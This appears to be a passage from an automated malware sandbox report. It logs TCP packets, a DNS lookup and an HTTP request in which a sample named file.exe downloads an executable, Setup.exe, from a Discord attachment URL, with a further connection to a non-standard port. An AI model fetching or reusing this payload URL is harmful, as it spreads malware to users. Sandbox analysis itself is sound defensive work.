                                                                                                                                                  Nov 15, 2022 18:54:38.598000050 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598001003 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.598028898 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598063946 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.598073006 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598094940 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598100901 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.598123074 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598143101 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.598151922 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598189116 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598189116 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.598212004 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598257065 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.598267078 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598278999 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598295927 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.598301888 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598339081 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.598347902 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598370075 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598375082 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.598392963 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598434925 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.598443031 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598460913 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598476887 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.598483086 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598529100 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.598550081 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598562956 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598573923 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.598587990 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598623991 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.598634958 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598661900 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.598666906 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598695040 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598727942 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.598737001 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598758936 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.598759890 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598782063 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598839998 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.598849058 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598861933 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598895073 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598913908 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.598923922 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598962069 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.598965883 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.598989964 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599030972 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.599040031 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599062920 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.599062920 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599087954 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599158049 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599165916 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.599174976 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599201918 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.599210978 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599246979 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.599256039 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599268913 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599284887 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.599293947 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599329948 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.599339962 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599359989 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.599364996 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599387884 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599391937 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.599400043 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599435091 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.599447012 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599472046 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599478960 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.599487066 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599531889 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.599540949 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599566936 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.599575043 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599600077 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.599618912 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599636078 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599670887 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.599679947 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599713087 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599711895 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.599736929 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599783897 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.599792957 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599806070 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599819899 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.599832058 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599860907 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.599869013 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599895000 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.599896908 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599922895 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599960089 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.599968910 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.599998951 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.600001097 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.600022078 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.600048065 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.600055933 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.600091934 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.600096941 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.600121021 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.600147009 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.600156069 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.600189924 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.600192070 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.600210905 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.600236893 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.600245953 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.600276947 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.600281954 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.600311041 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.600346088 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.600354910 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.600382090 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.600395918 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.600414991 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.600446939 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.600455046 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.600481987 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.600483894 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.600512028 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.600544930 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.600553989 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.600580931 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.600584984 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.600609064 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.600656033 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.603240967 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.603266954 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.603389978 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.603789091 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.603797913 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.603831053 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.603859901 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.603883982 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.603996992 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.604007006 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.604227066 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.604239941 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.604371071 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.604384899 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.604413033 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.604470968 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.604479074 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.604511023 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.604609966 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.604726076 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.604778051 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.635204077 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.635230064 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.635353088 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.636353970 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.636370897 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.636403084 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.636429071 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.636452913 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.636586905 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.636596918 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.636846066 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.636857986 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.636890888 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.637002945 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.637012005 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.637136936 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.637145996 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.637484074 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.637484074 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.637553930 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.637562990 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.637634993 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.656739950 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.656776905 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.656918049 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.657893896 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.657910109 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.657938004 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.657970905 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.657991886 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.658032894 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.658068895 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.658081055 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.658252001 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.658263922 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.658397913 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.658426046 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.658526897 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.658560038 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.658684015 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.658821106 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.658835888 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.658929110 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.681077003 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.681114912 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.681147099 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.681171894 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.681194067 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.681233883 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.681379080 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.681392908 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.681560040 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.681571960 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.681607962 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.681693077 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.681704998 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.681823969 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.682089090 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.682104111 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.682214022 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.682214022 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.682223082 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.682233095 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.682261944 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.682296038 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.682312965 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.682352066 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.682358027 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.682384968 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.682390928 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.682416916 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.682432890 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.682445049 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.682559967 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.682569027 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.682666063 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.682676077 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.682707071 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.682770014 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.682779074 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.682871103 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.682897091 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.682930946 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.682990074 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.683092117 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.683192968 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.683233976 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.702394009 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.725130081 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.774702072 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:42.350080013 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:42.430721045 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:42.478637934 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:42.592770100 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Nov 15, 2022 18:54:37.157516956 CET4972453192.168.2.58.8.8.8
                                                                                                                                                  Nov 15, 2022 18:54:37.176943064 CET53497248.8.8.8192.168.2.5
                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                  Nov 15, 2022 18:54:37.157516956 CET192.168.2.58.8.8.80xc650Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                  Nov 15, 2022 18:54:37.176943064 CET8.8.8.8192.168.2.50xc650No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 15, 2022 18:54:37.176943064 CET8.8.8.8192.168.2.50xc650No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 15, 2022 18:54:37.176943064 CET8.8.8.8192.168.2.50xc650No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 15, 2022 18:54:37.176943064 CET8.8.8.8192.168.2.50xc650No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 15, 2022 18:54:37.176943064 CET8.8.8.8192.168.2.50xc650No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                                                                                                                  • cdn.discordapp.com
                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.549707162.159.133.233443C:\Users\user\Desktop\file.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  2022-11-15 17:54:38 UTC0OUTGET /attachments/1013922792204415100/1029136565533933638/Setup.exe HTTP/1.1
                                                                                                                                                  Host: cdn.discordapp.com
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2022-11-15 17:54:38 UTC0INHTTP/1.1 200 OK
                                                                                                                                                  Date: Tue, 15 Nov 2022 17:54:38 GMT
                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                  Content-Length: 5490488
                                                                                                                                                  Connection: close
                                                                                                                                                  CF-Ray: 76a9da6de996903a-FRA
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Age: 75009
                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                  Content-Disposition: attachment;%20filename=Setup.exe
                                                                                                                                                  ETag: "bcbb46256a4af7b5509b2924be449bc3"
                                                                                                                                                  Expires: Wed, 15 Nov 2023 17:54:38 GMT
                                                                                                                                                  Last-Modified: Mon, 10 Oct 2022 21:01:17 GMT
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                  x-goog-generation: 1665435677723874
                                                                                                                                                  x-goog-hash: crc32c=eTIVsQ==
                                                                                                                                                  x-goog-hash: md5=vLtGJWpK97VQmykkvkSbww==
                                                                                                                                                  x-goog-metageneration: 1
                                                                                                                                                  x-goog-storage-class: STANDARD
                                                                                                                                                  x-goog-stored-content-encoding: identity
                                                                                                                                                  x-goog-stored-content-length: 5490488
                                                                                                                                                  X-GUploader-UploadID: ADPycdtVJySJEx2YmNpmzh9eIRo4HESOZM6UrYaibfWsnS8NbMnt_dZUVh1NX2vXftpFvrrSBzjVqOGbyvs9QmmMd0XOww
                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sH3jnJDoCsLv0WB0HS8gTH3nGAWw6BoShnEVVJDCjY7xkBmby3Ml0ZAJU9foS2%2FRlQQKFo4fgEfqGoJcDoDVRSXHjjNAvonkOsB5cjFIL%2BMZEubNeDeTPWm72jMNEWSSscRzuQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  2022-11-15 17:54:38 UTC1INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii: MZ@
